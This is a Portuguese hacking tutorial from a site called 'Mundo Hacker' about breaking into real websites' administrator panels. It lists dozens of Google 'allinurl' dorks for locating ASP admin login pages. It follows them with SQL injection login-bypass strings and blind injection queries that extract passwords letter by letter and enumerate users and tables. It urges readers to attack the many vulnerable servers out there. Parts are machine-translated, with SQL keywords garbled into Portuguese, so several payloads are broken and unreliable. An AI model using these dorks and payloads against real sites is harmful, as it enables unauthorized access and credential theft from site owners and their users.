URL:

Opção :




INVADINDO SITES COM STRINGS - COMPLETO

Tutorial Invadindo sites :


(LEIA: SE VOÇE USAR UMAS DAS STRINGS EM ALGUNS SERVIDORES E NÃO CONSEGUIR ACÉSSO É PORQUE O MESMO ESTA PROTEGIDO CONTRA ATAQUES DESSE TIPO. MAIS EXISTEM VÁRIOS SERVIDORES AI VULNERÁVEIS...

Vou acessar o painel administrativo de um site através de uma técnica chamada “ SQL injection “.
Primeiramente,vou ensinar a voces como pesquisarem por sites vulneraveis a SQL injection com o próprio site do GOOGLE.

1) Acesse www.google.com.br

2) Pesquise por qualquer uma das strings abaixo:



allinurl:admin/index.asp

allinurl:admin/default.asp


allinurl:admin/admin.asp


allinurl:admin/login.asp


allinurl:/admin/entrar.asp


allinurl:/admin/default.asp


allinurl:/admin/index.asp


allinurl:/admin/login.asp


allinurl:/admin/password.asp


allinurl:/admin/senha.asp


allinurl:/login/login.asp


allinurl:/adm/login.asp


allinurl:/adm/index.asp


allinurl:/adm/default.asp


allinurl:/login/index.asp


allinurl:/login/default.asp


allinurl:/webmaster/login.asp


allinurl:/webadmin/default.asp


allinurl:/webadmin/index.asp


allinurl:/webadmin/default.asp


allinurl:/menu_admin/default.asp


allinurl:/menu_admin/index.asp


allinurl:/menu_admin/login.asp


allinurl:/noticias/admin/


allinurl:/news/admin/


allinurl:/cadastro/admin/


allinurl:/portal/admin/


allinurl:/site/admin/


allinurl:/home/admin.asp


allinurl:/home/admin/index.asp


allinurl:/home/admin/default.asp


allinurl:/home/admin/login.asp


allinurl:/web/admin/index.asp


allinurl:/web/admin/default.asp


allinurl:/web/admin/login.asp


allinurl:/home/adm/login.asp


allinurl:/home/adm/senha.asp


allinurl:/home/adm/index.asp


allinurl:/home/adm/defaul.asp


allinurl:/menu/admin/index.asp


allinurl:/menu/admin/default.asp


allinurl:/menu/admin/login.asp


allinurl:/menu/admin/admin.asp


allinurl:/painel/admin/admin.asp


allinurl:/painel/admin/login.asp


allinurl:/painel/admin/index.asp


allinurl:/painel/admin/default.asp


allinurl:/site/admin/default.asp


allinurl:/site/admin/index.asp


allinurl:/site/admin/login.asp


allinurl:/asp/admin/login.asp


allinurl:/asp/admin/index.asp


allinurl:/pedidos/admin/index.asp


allinurl:/pedidos/admin/login.asp


allinurl:/compras/admin/


allinurl:/clientes/admin/


allinurl:/busines/admin/


allinurl:/area_restrita/admin.asp


allinurl:/area_restrita/login.asp


allinurl:/area_restrita/index.asp


allinurl:/acesso/admin.asp


allinurl:/acesso/admin/default.asp


allinurl:/acesso/admin/index.asp


allinurl:/post/admin/default.asp


allinurl:/post/admin/


allinurl:/post/admin/index.asp


allinurl:/post/admin/login.asp


allinurl:/eshop/admin/


allinurl:/eshop/admin.asp


allinurl:/eshop/admin/default.asp


allinurl:/eshop/admin/index.asp


allinurl:/comercio/admin.asp


allinurl:/comercio/admin/default.asp


allinurl:/comercio/admin/index.asp


allinurl:/news/admin/login.asp


allinurl:/news/admin/default.asp


allinurl:/news/admin/index.asp


allinurl:/imprensa/login.asp


allinurl:/imprensa/admin.asp


allinurl:/imprensa/admin/default.asp


Após voces pesquisarem,uma série de páginas serão encontradas. Wink
Arrow Geralmente quando voce acessa uma destas páginas,voce ira cair na tela de “login” do administrador,onde voce deve digitar o nome de usuario e a senha para conseguir acesso ADM do site.
É aqui que usamos o SQL injection,ao invés de colocarmos a senha,usamos algumas strings nos campos de logins,caso voce consiga acessar o painel de controle do ADM,é porque o site esta vulneravel a SQL injection.
Arrow Abaixo vou colocar algumas strings para voces colocarem nos campos de logins: ( Só lembrando que cada string serve para o campo "nome de usuario" e o campo "senha" ao mesmo tempo Wink )

b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a

USE AS STRINGS DESTA FORMA :

LOGIN: b' or ' 1='

SENHA: b' or ' 1='

LOGIN: b' or ' 1='

SENHA: b' or ' 1='

ESSA STRING FAZ "PERGUNTAS AO BANCO DE DADOS SOBRE LETRAS DE SENHAS" :
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
A STRING ACIMA PERGUNTA AO SERVIDOR SE HÁ A LETRA "W" NA SENHA....
você pode obter o sistema para responder a perguntas sobre a mesa de senha.
Ele só vai responder sim (e deixá-lo em) ou não
(por recusa de entrada).
Suas perguntas devem tomar a forma
de uma consulta SQL válida. Em cada caso, use um xx para o nome
do usuário eo texto como senha.
Você pode fazer perguntas, tais como:
A senha do jake tem um w nele?

     'OU EXISTE (SELECT * FROM users WHERE name =' Jake 'AND senha LIKE'% w%) e'' = '
A senha do jake começar com w?

     'OU EXISTE (SELECT * FROM users WHERE name =' Jake 'AND senha LIKE' w%) e'' = '
A senha do jake tem um w seguido por d?

     'OU EXISTE (SELECT * FROM users WHERE name =' Jake 'AND senha LIKE'% w% d%) e'' = '
É a quarta carta de Jake senha w?

     'OU EXISTE (SELECT * FROM users WHERE name =' Jake 'AND senha LIKE' ___w%) e'' = '

Isso funciona porque o comando como
usa% e _ como curingas.
O wildcard% corresponde a qualquer string,
o curinga _ corresponde a um único personagem.

Você pode encontrar outros usuários do sistema.
Nós escolhemos para obter a senha de jake,
simplesmente porque ele foi o primeiro na lista,
mas pode haver outros. Você pode ainda só perguntar perguntas
sim / não, mas você pode encontrar
praticamente qualquer coisa que você quer
com um pouco de paciência.
Novamente você usar xx para o nome de usuário
e digite o seguinte como password:

Há mais de 10 linhas na tabela de senha?

     'OR (SELECT COUNT (*) FROM users)> 10 AND'' ='
Existe um usuário com uma r em seu nome?

     'OU EXISTE (SELECT * FROM users WHERE nome LIKE'% r%) e'' = '
Existe um usuário (que jake) com um uma em seu nome?

     'OU EXISTE (SELECT * FROM utilizadores WHERE nome! =' Jake 'AND nome LIKE'% a%) e'' = '

Você precisa descobrir o nome do banco de dados que você está usando.
A função DATABASE () que lhe dará valor
(mas você tem que adivinhar como antes).
Quando você sabe o nome do banco
de dados a ser utilizado pode levar
palpites para os nomes das tabelas.
O banco de dados atual contêm a letra j?

     'OR existe (SELECT 1 FROM dual ONDE banco de dados () like'% j%) e'' = '
Existe uma tabela chamada em um teste de banco de dados?

     'OU EXISTE (SELECT * FROM INFORMATION_SCHEMA.TABLES ONDE TABLE_SCHEMA =' teste 'AND TABLE_NAME =' um ') e'' ='
Há mais de uma tabela no banco de dados (s) contendo aj?

     'OR (SELECT COUNT (*) FROM INFORMATION_SCHEMA.TABLES ONDE TABLE_SCHEMA like'% j% ')> = 1 AND'''

QUER TESTAR O QUE VOÇÊ APRENDEU AKI ? VISITE AKI UM PEQUENO TUTORIAL COM UM SRVER FALSO, APENAS PARA TESTES

<-=MUNDO HACKER=.:->

Compartilhar usando :

DEIXE SEU COMENTARIO :

Comentarios - Mundo Hacker | Facebook-copyright(™ © ®)